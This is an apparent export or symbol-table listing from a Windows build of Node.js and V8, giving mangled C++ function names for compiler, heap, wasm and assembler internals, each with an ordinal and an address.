                                                                                                                                                                                                        ?AsFixedDoubleArray@ObjectRef@compiler@internal@v8@@QEBA?AVFixedDoubleArrayRef@234@XZ33540x140e82830
                                                                                                                                                                                                        ?AsFunctionTemplateInfo@ObjectRef@compiler@internal@v8@@QEBA?AVFunctionTemplateInfoRef@234@XZ33550x140e828e0
                                                                                                                                                                                                        ?AsFunctionType@AsmCallableType@wasm@internal@v8@@UEAAPEAVAsmFunctionType@234@XZ33560x14007a0a0
                                                                                                                                                                                                        ?AsFunctionType@AsmFunctionType@wasm@internal@v8@@UEAAPEAV1234@XZ33570x140078ac0
                                                                                                                                                                                                        ?AsFunctionType@AsmType@wasm@internal@v8@@QEAAPEAVAsmFunctionType@234@XZ33580x140632380
                                                                                                                                                                                                        ?AsHeap@LocalHeap@internal@v8@@QEAAPEAVHeap@23@XZ33590x140078aa0
                                                                                                                                                                                                        ?AsHeapConstant@Type@compiler@internal@v8@@QEBAPEBVHeapConstantType@234@XZ33600x140078aa0
                                                                                                                                                                                                        ?AsHeapNumber@ObjectRef@compiler@internal@v8@@QEBA?AVHeapNumberRef@234@XZ33610x140e82990
                                                                                                                                                                                                        ?AsHeapObject@ObjectRef@compiler@internal@v8@@QEBA?AVHeapObjectRef@234@XZ33620x140e81c20
                                                                                                                                                                                                        ?AsIdentifier@Parser@internal@v8@@CAPEBVAstRawString@23@PEAVExpression@23@@Z33630x140773730
                                                                                                                                                                                                        ?AsIdentifierExpression@Parser@internal@v8@@AEAAPEAVVariableProxy@23@PEAVExpression@23@@Z33640x140773760
                                                                                                                                                                                                        ?AsInt64@BigInt@internal@v8@@QEAA_JPEA_N@Z33650x1408c4840
                                                                                                                                                                                                        ?AsInternalizedString@ObjectRef@compiler@internal@v8@@QEBA?AVInternalizedStringRef@234@XZ33660x140e82ac0
                                                                                                                                                                                                        ?AsIsolate@Isolate@internal@v8@@QEAAPEAV123@XZ33670x140078ac0
                                                                                                                                                                                                        ?AsIsolate@LocalIsolate@internal@v8@@QEAAPEAVIsolate@23@XZ33680x1402c3710
                                                                                                                                                                                                        ?AsIterationStatement@Parser@internal@v8@@AEAAPEAVIterationStatement@23@PEAVBreakableStatement@23@@Z33690x140773780
                                                                                                                                                                                                        ?AsJSArray@ObjectRef@compiler@internal@v8@@QEBA?AVJSArrayRef@234@XZ33700x140e82c10
                                                                                                                                                                                                        ?AsJSBoundFunction@ObjectRef@compiler@internal@v8@@QEBA?AVJSBoundFunctionRef@234@XZ33710x140e82d30
                                                                                                                                                                                                        ?AsJSDataView@ObjectRef@compiler@internal@v8@@QEBA?AVJSDataViewRef@234@XZ33720x140e82db0
                                                                                                                                                                                                        ?AsJSFunction@ObjectRef@compiler@internal@v8@@QEBA?AVJSFunctionRef@234@XZ33730x140e82ee0
                                                                                                                                                                                                        ?AsJSGlobalObject@ObjectRef@compiler@internal@v8@@QEBA?AVJSGlobalObjectRef@234@XZ33740x140e82fb0
                                                                                                                                                                                                        ?AsJSGlobalProxy@ObjectRef@compiler@internal@v8@@QEBA?AVJSGlobalProxyRef@234@XZ33750x140e83030
                                                                                                                                                                                                        ?AsJSON@compiler@internal@v8@@YA?AUGraphAsJSON@123@AEBVGraph@123@PEAVSourcePositionTable@123@PEAVNodeOriginTable@123@@Z33760x14044f620
                                                                                                                                                                                                        ?AsJSON@compiler@internal@v8@@YA?AUNodeOriginAsJSON@123@AEBVNodeOrigin@123@@Z33770x140078b40
                                                                                                                                                                                                        ?AsJSON@compiler@internal@v8@@YA?AUSourcePositionAsJSON@123@AEBVSourcePosition@23@@Z33780x140078b40
                                                                                                                                                                                                        ?AsJSObject@ObjectRef@compiler@internal@v8@@QEBA?AVJSObjectRef@234@XZ33790x140e83150
                                                                                                                                                                                                        ?AsJSReceiver@ObjectRef@compiler@internal@v8@@QEBA?AVJSReceiverRef@234@XZ33800x140e831d0
                                                                                                                                                                                                        ?AsJSTypedArray@ObjectRef@compiler@internal@v8@@QEBA?AVJSTypedArrayRef@234@XZ33810x140e832f0
                                                                                                                                                                                                        ?AsJavaScript@FrameSummary@internal@v8@@QEBAAEBVJavaScriptFrameSummary@123@XZ33820x140078ac0
                                                                                                                                                                                                        ?AsLocalIsolate@Isolate@internal@v8@@QEAAPEAVLocalIsolate@23@XZ33830x1404828e0
                                                                                                                                                                                                        ?AsLocalIsolate@LocalIsolate@internal@v8@@QEAAPEAV123@XZ33840x140078ac0
                                                                                                                                                                                                        ?AsMap@ObjectRef@compiler@internal@v8@@QEBA?AVMapRef@234@XZ33850x140e833f0
                                                                                                                                                                                                        ?AsModuleScope@Scope@internal@v8@@QEAAPEAVModuleScope@23@XZ33860x140078ac0
                                                                                                                                                                                                        ?AsModuleScope@Scope@internal@v8@@QEBAPEBVModuleScope@23@XZ33870x140078ac0
                                                                                                                                                                                                        ?AsName@ObjectRef@compiler@internal@v8@@QEBA?AVNameRef@234@XZ33880x140e834a0
                                                                                                                                                                                                        ?AsNativeContext@ObjectRef@compiler@internal@v8@@QEBA?AVNativeContextRef@234@XZ33890x140e83550
                                                                                                                                                                                                        ?AsObjectBoilerplateDescription@ObjectRef@compiler@internal@v8@@QEBA?AVObjectBoilerplateDescriptionRef@234@XZ33900x140e835d0
                                                                                                                                                                                                        ?AsOtherNumberConstant@Type@compiler@internal@v8@@QEBAPEBVOtherNumberConstantType@234@XZ33910x140078aa0
                                                                                                                                                                                                        ?AsOverloadedFunctionType@AsmCallableType@wasm@internal@v8@@UEAAPEAVAsmOverloadedFunctionType@234@XZ33920x14007a0a0
                                                                                                                                                                                                        ?AsOverloadedFunctionType@AsmOverloadedFunctionType@wasm@internal@v8@@UEAAPEAV1234@XZ33930x140078ac0
                                                                                                                                                                                                        ?AsOverloadedFunctionType@AsmType@wasm@internal@v8@@QEAAPEAVAsmOverloadedFunctionType@234@XZ33940x1406323a0
                                                                                                                                                                                                        ?AsPropertyCell@ObjectRef@compiler@internal@v8@@QEBA?AVPropertyCellRef@234@XZ33950x140e83720
                                                                                                                                                                                                        ?AsRange@Type@compiler@internal@v8@@QEBAPEBVRangeType@234@XZ33960x140078aa0
                                                                                                                                                                                                        ?AsRegExpBoilerplateDescription@ObjectRef@compiler@internal@v8@@QEBA?AVRegExpBoilerplateDescriptionRef@234@XZ33970x140e83e00
                                                                                                                                                                                                        ?AsScopeInfo@ObjectRef@compiler@internal@v8@@QEBA?AVScopeInfoRef@234@XZ33980x140e83eb0
                                                                                                                                                                                                        ?AsScriptContextTable@ObjectRef@compiler@internal@v8@@QEBA?AVScriptContextTableRef@234@XZ33990x140e83f60
                                                                                                                                                                                                        ?AsSharedFunctionInfo@ObjectRef@compiler@internal@v8@@QEBA?AVSharedFunctionInfoRef@234@XZ34000x140e83fe0
                                                                                                                                                                                                        ?AsSmi@ObjectRef@compiler@internal@v8@@QEBAHXZ34010x140e84090
                                                                                                                                                                                                        ?AsSourceTextModule@ObjectRef@compiler@internal@v8@@QEBA?AVSourceTextModuleRef@234@XZ34020x140e840a0
                                                                                                                                                                                                        ?AsString@ObjectRef@compiler@internal@v8@@QEBA?AVStringRef@234@XZ34030x140e84150
                                                                                                                                                                                                        ?AsSymbol@ObjectRef@compiler@internal@v8@@QEBA?AVSymbolRef@234@XZ34040x140e84200
                                                                                                                                                                                                        ?AsTemplateObjectDescription@ObjectRef@compiler@internal@v8@@QEBA?AVTemplateObjectDescriptionRef@234@XZ34050x140e842b0
                                                                                                                                                                                                        ?AsTuple@Type@compiler@internal@v8@@QEBAPEBVTupleType@234@XZ34060x140078aa0
                                                                                                                                                                                                        ?AsUnion@Type@compiler@internal@v8@@AEBAPEBVUnionType@234@XZ34070x140078aa0
                                                                                                                                                                                                        ?AsUnionForTesting@Type@compiler@internal@v8@@QEAAPEBVUnionType@234@XZ34080x1404bb440
                                                                                                                                                                                                        ?AsUnsigned@AsmJsScanner@internal@v8@@QEBAIXZ34090x140636690
                                                                                                                                                                                                        ?AsValueType@AsmType@wasm@internal@v8@@QEAAPEAVAsmValueType@234@XZ34100x1406323c0
                                                                                                                                                                                                        ?AsWasm@FrameSummary@internal@v8@@QEBAAEBVWasmFrameSummary@123@XZ34110x140078ac0
                                                                                                                                                                                                        ?AsanNew@Zone@internal@v8@@AEAAPEAX_K@Z34120x1406abc60
                                                                                                                                                                                                        ?AsmjsSignature@WasmOpcodes@wasm@internal@v8@@SAPEBV?$Signature@VValueType@wasm@internal@v8@@@34@W4WasmOpcode@234@@Z34130x14052b9a0
                                                                                                                                                                                                        ?AssembleArchBinarySearchSwitch@CodeGenerator@compiler@internal@v8@@AEAAXPEAVInstruction@234@@Z34140x1404e37a0
                                                                                                                                                                                                        ?AssembleArchBinarySearchSwitchRange@CodeGenerator@compiler@internal@v8@@AEAAXVRegister@34@VRpoNumber@234@PEAU?$pair@HPEAVLabel@internal@v8@@@std@@2@Z34150x140ee55b0
                                                                                                                                                                                                        ?AssembleArchBoolean@CodeGenerator@compiler@internal@v8@@AEAAXPEAVInstruction@234@W4FlagsCondition@234@@Z34160x1404e3a60
                                                                                                                                                                                                        ?AssembleArchBranch@CodeGenerator@compiler@internal@v8@@AEAAXPEAVInstruction@234@PEAUBranchInfo@234@@Z34170x1404e3b80
                                                                                                                                                                                                        ?AssembleArchDeoptBranch@CodeGenerator@compiler@internal@v8@@AEAAXPEAVInstruction@234@PEAUBranchInfo@234@@Z34180x1404e3c30
                                                                                                                                                                                                        ?AssembleArchInstruction@CodeGenerator@compiler@internal@v8@@AEAA?AW4CodeGenResult@1234@PEAVInstruction@234@@Z34190x1404e3db0
                                                                                                                                                                                                        ?AssembleArchJump@CodeGenerator@compiler@internal@v8@@AEAAXVRpoNumber@234@@Z34200x1404fba40
                                                                                                                                                                                                        ?AssembleArchSelect@CodeGenerator@compiler@internal@v8@@AEAAXPEAVInstruction@234@W4FlagsCondition@234@@Z34210x1404fba90
                                                                                                                                                                                                        ?AssembleArchTableSwitch@CodeGenerator@compiler@internal@v8@@AEAAXPEAVInstruction@234@@Z34220x1404fbee0
                                                                                                                                                                                                        ?AssembleArchTrap@CodeGenerator@compiler@internal@v8@@AEAAXPEAVInstruction@234@W4FlagsCondition@234@@Z34230x1404fc180
                                                                                                                                                                                                        ?AssembleBlock@CodeGenerator@compiler@internal@v8@@AEAA?AW4CodeGenResult@1234@PEBVInstructionBlock@234@@Z34240x140ee5710
                                                                                                                                                                                                        ?AssembleBranchPoisoning@CodeGenerator@compiler@internal@v8@@AEAAXW4FlagsCondition@234@PEAVInstruction@234@@Z34250x1404fc270
                                                                                                                                                                                                        ?AssembleCode@CodeGenerator@compiler@internal@v8@@QEAAXXZ34260x140ee5b10
                                                                                                                                                                                                        ?AssembleCodeStartRegisterCheck@CodeGenerator@compiler@internal@v8@@AEAAXXZ34270x1404fc2e0
                                                                                                                                                                                                        ?AssembleConstructFrame@CodeGenerator@compiler@internal@v8@@AEAAXXZ34280x1404fc330
                                                                                                                                                                                                        ?AssembleDeconstructFrame@CodeGenerator@compiler@internal@v8@@AEAAXXZ34290x1404fc890
                                                                                                                                                                                                        ?AssembleDeoptImmediateArgs@CodeGenerator@compiler@internal@v8@@AEAAXPEBV?$ZoneVector@PEAVImmediateOperand@compiler@internal@v8@@@34@PEAVLabel@34@@Z34300x140ee63e0
                                                                                                                                                                                                        ?AssembleDeoptimizerCall@CodeGenerator@compiler@internal@v8@@AEAA?AW4CodeGenResult@1234@PEAVDeoptimizationExit@234@@Z34310x140ee65d0
                                                                                                                                                                                                        ?AssembleGaps@CodeGenerator@compiler@internal@v8@@AEAAXPEAVInstruction@234@@Z34320x140ee6730
                                                                                                                                                                                                        ?AssembleInstruction@CodeGenerator@compiler@internal@v8@@AEAA?AW4CodeGenResult@1234@HPEBVInstructionBlock@234@@Z34330x140ee6780
                                                                                                                                                                                                        ?AssembleJumpTable@CodeGenerator@compiler@internal@v8@@AEAAXPEAPEAVLabel@34@_K@Z34340x1404fc8e0
                                                                                                                                                                                                        ?AssembleMove@CodeGenerator@compiler@internal@v8@@EEAAXPEAVInstructionOperand@234@0@Z34350x1404fc940
                                                                                                                                                                                                        ?AssemblePrepareTailCall@CodeGenerator@compiler@internal@v8@@AEAAXXZ34360x1404fd2a0
                                                                                                                                                                                                        ?AssembleRegisterArgumentPoisoning@CodeGenerator@compiler@internal@v8@@AEAAXXZ34370x1404fd320
                                                                                                                                                                                                        ?AssembleReturn@CodeGenerator@compiler@internal@v8@@AEAAXPEAVInstructionOperand@234@@Z34380x1404fd390
                                                                                                                                                                                                        ?AssembleSourcePosition@CodeGenerator@compiler@internal@v8@@QEAAXPEAVInstruction@234@@Z34390x140ee6ac0
                                                                                                                                                                                                        ?AssembleSourcePosition@CodeGenerator@compiler@internal@v8@@QEAAXVSourcePosition@34@@Z34400x140ee6b70
                                                                                                                                                                                                        ?AssembleSwap@CodeGenerator@compiler@internal@v8@@EEAAXPEAVInstructionOperand@234@0@Z34410x1404fd870
                                                                                                                                                                                                        ?AssembleTailCallAfterGap@CodeGenerator@compiler@internal@v8@@AEAAXPEAVInstruction@234@H@Z34420x1404fe050
                                                                                                                                                                                                        ?AssembleTailCallBeforeGap@CodeGenerator@compiler@internal@v8@@AEAAXPEAVInstruction@234@H@Z34430x1404fe100
                                                                                                                                                                                                        ?Assert@ReasonEnum@Paused@API@Debugger@protocol@v8_inspector@@3PEBDEB34440x141ff9a38
                                                                                                                                                                                                        ?Assert@TurboAssembler@internal@v8@@QEAAXW4Condition@23@W4AbortReason@23@@Z34450x140078990
                                                                                                                                                                                                        ?AssertBoundFunction@MacroAssembler@internal@v8@@QEAAXVRegister@23@@Z34460x140078990
                                                                                                                                                                                                        ?AssertCodeT@MacroAssembler@internal@v8@@QEAAXVRegister@23@@Z34470x140078990
                                                                                                                                                                                                        ?AssertConstructor@MacroAssembler@internal@v8@@QEAAXVRegister@23@@Z34480x140078990
                                                                                                                                                                                                        ?AssertDebugContext@Debug@internal@v8@@AEAAXXZ34490x140078990
                                                                                                                                                                                                        ?AssertFunction@MacroAssembler@internal@v8@@QEAAXVRegister@23@@Z34500x140078990
                                                                                                                                                                                                        ?AssertGeneratorObject@MacroAssembler@internal@v8@@QEAAXVRegister@23@@Z34510x140078990
                                                                                                                                                                                                        ?AssertHeld@Mutex@base@v8@@QEBAXXZ34520x140078990
                                                                                                                                                                                                        ?AssertHeld@RecursiveMutex@base@v8@@QEBAXXZ34530x140078990
                                                                                                                                                                                                        ?AssertHeldAndUnmark@Mutex@base@v8@@AEAAXXZ34540x140078990
                                                                                                                                                                                                        ?AssertLocked@PersistentRegionLock@internal@cppgc@@SAXXZ34550x140457810
                                                                                                                                                                                                        ?AssertNotSmi@TurboAssembler@internal@v8@@QEAAXVRegister@23@@Z34560x140078990
                                                                                                                                                                                                        ?AssertSmi@TurboAssembler@internal@v8@@QEAAXVOperand@23@@Z34570x140078990
                                                                                                                                                                                                        ?AssertSmi@TurboAssembler@internal@v8@@QEAAXVRegister@23@@Z34580x140078990
                                                                                                                                                                                                        ?AssertType@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@VType@234@@Z34590x140f4b890
                                                                                                                                                                                                        ?AssertUndefinedOrAllocationSite@MacroAssembler@internal@v8@@QEAAXVRegister@23@@Z34600x140078990
                                                                                                                                                                                                        ?AssertUnheld@Mutex@base@v8@@QEBAXXZ34610x140078990
                                                                                                                                                                                                        ?AssertUnheldAndMark@Mutex@base@v8@@AEAAXXZ34620x140078990
                                                                                                                                                                                                        ?AssertUnreachable@TurboAssembler@internal@v8@@QEAAXW4AbortReason@23@@Z34630x140078990
                                                                                                                                                                                                        ?AssertZeroExtended@TurboAssembler@internal@v8@@QEAAXVRegister@23@@Z34640x140078990
                                                                                                                                                                                                        ?AssignBignum@Bignum@base@v8@@QEAAXAEBV123@@Z34650x140e6fca0
                                                                                                                                                                                                        ?AssignDecimalString@Bignum@base@v8@@QEAAXV?$Vector@$$CBD@23@@Z34660x140e6fd30
                                                                                                                                                                                                        ?AssignHexString@Bignum@base@v8@@QEAAXV?$Vector@$$CBD@23@@Z34670x140e70020
                                                                                                                                                                                                        ?AssignPowerUInt16@Bignum@base@v8@@QEAAXGH@Z34680x140e701f0
                                                                                                                                                                                                        ?AssignRange@WasmCodeManager@wasm@internal@v8@@AEAAXVAddressRegion@base@4@PEAVNativeModule@234@@Z34690x1405691a0
                                                                                                                                                                                                        ?AssignUInt16@Bignum@base@v8@@QEAAXG@Z34700x140e70400
                                                                                                                                                                                                        ?AssignUInt64@Bignum@base@v8@@QEAAX_K@Z34710x140e70460
                                                                                                                                                                                                        ?AsyncCompile@WasmEngine@wasm@internal@v8@@QEAAXPEAVIsolate@34@AEBVWasmFeatures@234@V?$shared_ptr@VCompilationResultResolver@wasm@internal@v8@@@std@@AEBUModuleWireBytes@234@_NPEBD@Z34720x1405549a0
                                                                                                                                                                                                        ?AsyncFunctionEnter@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ34730x140f3a1f0
                                                                                                                                                                                                        ?AsyncFunctionReject@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ34740x140f3a200
                                                                                                                                                                                                        ?AsyncFunctionResolve@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ34750x140f3a210
                                                                                                                                                                                                        ?AsyncHooksGetExecutionAsyncId@node@@YANPEAVIsolate@v8@@@Z34760x140289b40
                                                                                                                                                                                                        ?AsyncHooksGetTriggerAsyncId@node@@YANPEAVIsolate@v8@@@Z34770x140289b70
                                                                                                                                                                                                        ?AsyncInstantiate@WasmEngine@wasm@internal@v8@@QEAAXPEAVIsolate@34@V?$unique_ptr@VInstantiationResultResolver@wasm@internal@v8@@U?$default_delete@VInstantiationResultResolver@wasm@internal@v8@@@std@@@std@@V?$Handle@VWasmModuleObject@internal@v8@@@34@V?$MaybeHandle@VJSReceiver@internal@v8@@@34@@Z34780x140554ee0
                                                                                                                                                                                                        ?AsyncIteratorSymbolConstantPoolEntry@BytecodeArrayBuilder@interpreter@internal@v8@@QEAA_KXZ34790x1409192b0
                                                                                                                                                                                                        ?AtExit@node@@YAXPEAVEnvironment@1@P6AXPEAX@Z1@Z34800x140289ba0
                                                                                                                                                                                                        ?AtLoopHeader@ResumeJumpTarget@compiler@internal@v8@@SA?AV1234@HAEBV1234@@Z34810x141097ca0
                                                                                                                                                                                                        ?AtPut@?$Dictionary@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@KA?AV?$Handle@VGlobalDictionary@internal@v8@@@23@PEAVIsolate@23@V423@V?$Handle@VName@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@VPropertyDetails@23@@Z34820x1407f1e90
                                                                                                                                                                                                        ?AtPut@?$Dictionary@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@KA?AV?$Handle@VNameDictionary@internal@v8@@@23@PEAVIsolate@23@V423@V?$Handle@VName@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@VPropertyDetails@23@@Z34830x1407f1fe0
                                                                                                                                                                                                        ?AtPut@?$Dictionary@VNumberDictionary@internal@v8@@VNumberDictionaryShape@23@@internal@v8@@KA?AV?$Handle@VNumberDictionary@internal@v8@@@23@PEAVIsolate@23@V423@IV?$Handle@VObject@internal@v8@@@23@VPropertyDetails@23@@Z34840x1407f2170
                                                                                                                                                                                                        ?AtPut@?$Dictionary@VSimpleNumberDictionary@internal@v8@@VSimpleNumberDictionaryShape@23@@internal@v8@@KA?AV?$Handle@VSimpleNumberDictionary@internal@v8@@@23@PEAVIsolate@23@V423@IV?$Handle@VObject@internal@v8@@@23@VPropertyDetails@23@@Z34850x1407f2350
                                                                                                                                                                                                        ?AtomicAdd64@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@000@Z34860x140f1d450
                                                                                                                                                                                                        ?AtomicAdd@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UWord32T@internal@v8@@@34@VMachineType@34@V?$TNode@URawPtrT@internal@v8@@@34@V?$TNode@UUintPtrT@internal@v8@@@34@V534@@Z34870x140f1d4f0
                                                                                                                                                                                                        ?AtomicAdd@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@VMachineType@34@PEAV5234@11@Z34880x140f1d540
                                                                                                                                                                                                        ?AtomicAnd64@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@000@Z34890x140f1d5c0
                                                                                                                                                                                                        ?AtomicAnd@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UWord32T@internal@v8@@@34@VMachineType@34@V?$TNode@URawPtrT@internal@v8@@@34@V?$TNode@UUintPtrT@internal@v8@@@34@V534@@Z34900x140f1d660
                                                                                                                                                                                                        ?AtomicAnd@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@VMachineType@34@PEAV5234@11@Z34910x140f1d6b0
                                                                                                                                                                                                        ?AtomicCompareExchange64@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@00000@Z34920x140f1d730
                                                                                                                                                                                                        ?AtomicCompareExchange@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UWord32T@internal@v8@@@34@VMachineType@34@V?$TNode@URawPtrT@internal@v8@@@34@V?$TNode@UWordT@internal@v8@@@34@V534@3@Z34930x140f1d800
                                                                                                                                                                                                        ?AtomicCompareExchange@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@VMachineType@34@PEAV5234@111@Z34940x140f1d850
                                                                                                                                                                                                        ?AtomicExchange64@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@000@Z34950x140f1d8d0
                                                                                                                                                                                                        ?AtomicExchange@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UWord32T@internal@v8@@@34@VMachineType@34@V?$TNode@URawPtrT@internal@v8@@@34@V?$TNode@UUintPtrT@internal@v8@@@34@V534@@Z34960x140f1d970
                                                                                                                                                                                                        ?AtomicExchange@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@VMachineType@34@PEAV5234@11@Z34970x140f1d9c0
                                                                                                                                                                                                        ?AtomicLoad64@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z34980x140f1da40
                                                                                                                                                                                                        ?AtomicLoad@CodeAssembler@compiler@internal@v8@@AEAAPEAVNode@234@VMachineType@34@V?$TNode@URawPtrT@internal@v8@@@34@V?$TNode@UWordT@internal@v8@@@34@@Z34990x140f1dab0
                                                                                                                                                                                                        ?AtomicLoad@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@VMachineType@34@PEAV5234@1@Z35000x140f1db10
                                                                                                                                                                                                        ?AtomicOr64@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@000@Z35010x140f1db70
                                                                                                                                                                                                        ?AtomicOr@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UWord32T@internal@v8@@@34@VMachineType@34@V?$TNode@URawPtrT@internal@v8@@@34@V?$TNode@UUintPtrT@internal@v8@@@34@V534@@Z35020x140f1dc10
                                                                                                                                                                                                        ?AtomicOr@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@VMachineType@34@PEAV5234@11@Z35030x140f1dc60
                                                                                                                                                                                                        ?AtomicStore64@CodeAssembler@compiler@internal@v8@@QEAAXV?$TNode@URawPtrT@internal@v8@@@34@V?$TNode@UWordT@internal@v8@@@34@V?$TNode@UUintPtrT@internal@v8@@@34@2@Z35040x140f1dce0
                                                                                                                                                                                                        ?AtomicStore64@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@000@Z35050x140f1dd10
                                                                                                                                                                                                        ?AtomicStore@CodeAssembler@compiler@internal@v8@@QEAAXW4MachineRepresentation@34@V?$TNode@URawPtrT@internal@v8@@@34@V?$TNode@UWordT@internal@v8@@@34@V?$TNode@UWord32T@internal@v8@@@34@@Z35060x140f1ddb0
                                                                                                                                                                                                        ?AtomicStore@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@W4MachineRepresentation@34@PEAV5234@11@Z35070x140f1de30
                                                                                                                                                                                                        ?AtomicSub64@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@000@Z35080x140f1dea0
                                                                                                                                                                                                        ?AtomicSub@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UWord32T@internal@v8@@@34@VMachineType@34@V?$TNode@URawPtrT@internal@v8@@@34@V?$TNode@UUintPtrT@internal@v8@@@34@V534@@Z35090x140f1df40
                                                                                                                                                                                                        ?AtomicSub@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@VMachineType@34@PEAV5234@11@Z35100x140f1df90
                                                                                                                                                                                                        ?AtomicXor64@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@000@Z35110x140f1e010
                                                                                                                                                                                                        ?AtomicXor@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UWord32T@internal@v8@@@34@VMachineType@34@V?$TNode@URawPtrT@internal@v8@@@34@V?$TNode@UUintPtrT@internal@v8@@@34@V534@@Z35120x140f1e0b0
                                                                                                                                                                                                        ?AtomicXor@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@VMachineType@34@PEAV5234@11@Z35130x140f1e100
                                                                                                                                                                                                        ?Attach@JSArrayBuffer@internal@v8@@QEAAXV?$shared_ptr@VBackingStore@internal@v8@@@std@@@Z35140x14086b750
                                                                                                                                                                                                        ?AttachCppHeap@Heap@internal@v8@@QEAAXPEAVCppHeap@3@@Z35150x1409b0170
                                                                                                                                                                                                        ?AttachCppHeap@Isolate@v8@@QEAAXPEAVCppHeap@2@@Z35160x140b08a00
                                                                                                                                                                                                        ?AttachDeoptInlinedFrames@ProfilerListener@internal@v8@@AEAAXV?$Handle@VCode@internal@v8@@@23@PEAVCodeDeoptEventRecord@23@@Z35170x14074a0f0
                                                                                                                                                                                                        ?AttachIsolate@CppHeap@internal@v8@@QEAAXPEAVIsolate@23@@Z35180x1409e9440
                                                                                                                                                                                                        ?AttachLocalIsolate@JSHeapBroker@compiler@internal@v8@@QEAAXPEAVOptimizedCompilationInfo@34@PEAVLocalIsolate@34@@Z35190x140f2e400
                                                                                                                                                                                                        ?AttachOrEmitDeferredSourceInfo@BytecodeArrayBuilder@interpreter@internal@v8@@AEAAXPEAVBytecodeNode@234@@Z35200x1409192c0
                                                                                                                                                                                                        ?AttachPersistentHandles@LocalHeap@internal@v8@@QEAAXV?$unique_ptr@VPersistentHandles@internal@v8@@U?$default_delete@VPersistentHandles@internal@v8@@@std@@@std@@@Z35210x1409a3570
                                                                                                                                                                                                        ?AttachSharedWasmMemoryObject@BackingStore@internal@v8@@QEAAXPEAVIsolate@23@V?$Handle@VWasmMemoryObject@internal@v8@@@23@@Z35220x1408c9460
                                                                                                                                                                                                        ?AttachToNext@LiveRange@compiler@internal@v8@@QEAAXXZ35230x140f81930
                                                                                                                                                                                                        ?AttachToSharedIsolate@Isolate@internal@v8@@QEAAXPEAV123@@Z35240x140a0c5e0
                                                                                                                                                                                                        ?AutomaticallyRestoreInitialHeapLimit@Heap@internal@v8@@QEAAXN@Z35250x1409b01b0
                                                                                                                                                                                                        ?AutomaticallyRestoreInitialHeapLimit@Isolate@v8@@QEAAXN@Z35260x140b08a10
                                                                                                                                                                                                        ?Available@LargeObjectSpace@internal@v8@@UEAA_KXZ35270x14007a0a0
                                                                                                                                                                                                        ?Available@NewSpace@internal@v8@@UEAA_KXZ35280x1404828f0
                                                                                                                                                                                                        ?Available@PagedSpace@internal@v8@@UEAA_KXZ35290x1409645c0
                                                                                                                                                                                                        ?AverageMarkCompactMutatorUtilization@GCTracer@internal@v8@@QEBANXZ35300x1409c8470
                                                                                                                                                                                                        ?AverageSpeed@GCTracer@internal@v8@@CANAEBV?$RingBuffer@U?$pair@_KN@std@@@base@3@@Z35310x1409c84a0
                                                                                                                                                                                                        ?AverageSpeed@GCTracer@internal@v8@@CANAEBV?$RingBuffer@U?$pair@_KN@std@@@base@3@AEBU?$pair@_KN@std@@N@Z35320x1409c8530
                                                                                                                                                                                                        ?AverageSurvivalRatio@GCTracer@internal@v8@@QEBANXZ35330x1409c85b0
                                                                                                                                                                                                        ?AverageTimeToIncrementalMarkingTask@GCTracer@internal@v8@@QEBANXZ35340x1409c86d0
                                                                                                                                                                                                        ?AwaitCompileTasks@OptimizingCompileDispatcher@internal@v8@@QEAAXXZ35350x140a7a780
                                                                                                                                                                                                        ?Backtrack@RegExpBytecodeGenerator@internal@v8@@UEAAXXZ35360x14073c850
                                                                                                                                                                                                        ?Backtrack@RegExpMacroAssemblerX64@internal@v8@@UEAAXXZ35370x1404aa660
                                                                                                                                                                                                        ?Bailout@PreparseDataBuilder@internal@v8@@QEAAXXZ35380x140482960
                                                                                                                                                                                                        ?BailoutIfDeoptimized@CodeGenerator@compiler@internal@v8@@AEAAXXZ35390x1404fe420
                                                                                                                                                                                                        ?BasicBlockCount@Schedule@compiler@internal@v8@@QEBA_KXZ35400x1404c1910
                                                                                                                                                                                                        ?BeginArray@TracedValue@tracing@v8@@QEAAXPEBD@Z35410x1400f8a70
                                                                                                                                                                                                        ?BeginArray@TracedValue@tracing@v8@@QEAAXXZ35420x1406b6dd0
                                                                                                                                                                                                        ?BeginDictionary@TracedValue@tracing@v8@@QEAAXPEBD@Z35430x1400f8ad0
                                                                                                                                                                                                        ?BeginDictionary@TracedValue@tracing@v8@@QEAAXXZ35440x1406b6e70
                                                                                                                                                                                                        ?BeginFinally@TryFinallyBuilder@interpreter@internal@v8@@QEAAXXZ35450x1408f3870
